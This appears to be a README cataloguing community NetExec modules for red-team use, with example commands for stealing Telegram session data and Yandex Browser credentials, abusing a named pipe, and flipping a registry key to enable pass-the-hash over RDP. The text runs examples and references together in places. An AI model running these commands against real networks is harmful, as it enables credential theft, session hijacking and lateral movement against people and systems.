NetExec Modules
Custom modules for NetExec from various authors
If you have nxc installed via pipx, then put the modules on the path
~/.local/pipx/venvs/netexec/lib/python3.13/site-packages/nxc/modules/
- psexec_noinstall.py
Description: Using psexec_noinstall, it is possible to connect to this pipeline as any low-privileged user, since the DACL of the pipeline allows this.
Example:References:nxc smb 10.0.0.5 -u 'user' -p 'password' -M psexec_noinstall
https://github.com/MzHmO/psexec_noinstall
https://github.com/beaverdreamer/nxc-modules - telegram.py
Description: Stealing Telegram Desktop tdata to hijack a user's session.
Example:Search tdata from DIRnxc smb 10.0.0.0/8 -u 'user' -p 'password' -M telegram
Reference: https://github.com/CICADA8-Research/Penetration/tree/main/nxc%20modulesnxc smb 10.0.0.0/8 -u 'user' -p 'password' -M telegram -o SEARCH_DIR=c:\users\public
- yandex.py
Description: Stealing creds from Yandex Browser.
Example:References:nxc smb 10.0.0.5 -u 'user' -p 'password' -M yandex
https://github.com/Moghees244
https://github.com/voixe852/nxc_module_yandex - restrictedadmin.py
Description: This module is designed to perform three main actions on a registry key: "DisableRestrictedAdmin". This key manages Windows "Restricted Admin" protection. If this protection is enabled, it is possible to perform Pass-The-Hash (PTH) on the RDP protocol, particularly with xfreerdp, as Windows uses the NTLM hash for authentication.
Example:With ACTION#See the value of the registry key and deduce if PTH is is possible or not nxc smb 10.0.0.5 -u 'user' -p 'password' -M restrictedadmin
Reference: https://github.com/Anh4ckin3/nxc-module-personal-repo#Set value to 0, that will enable the security option "RestricedAdmin" and allow PTH on RDP nxc smb 10.0.0.5 -u 'user' -p 'password' -M restrictedadmin -o ACTION=enable #Set value to 1, PTH will be no longer possible nxc smb 10.0.0.5 -u 'user' -p 'password' -M restrictedadmin -o ACTION=disable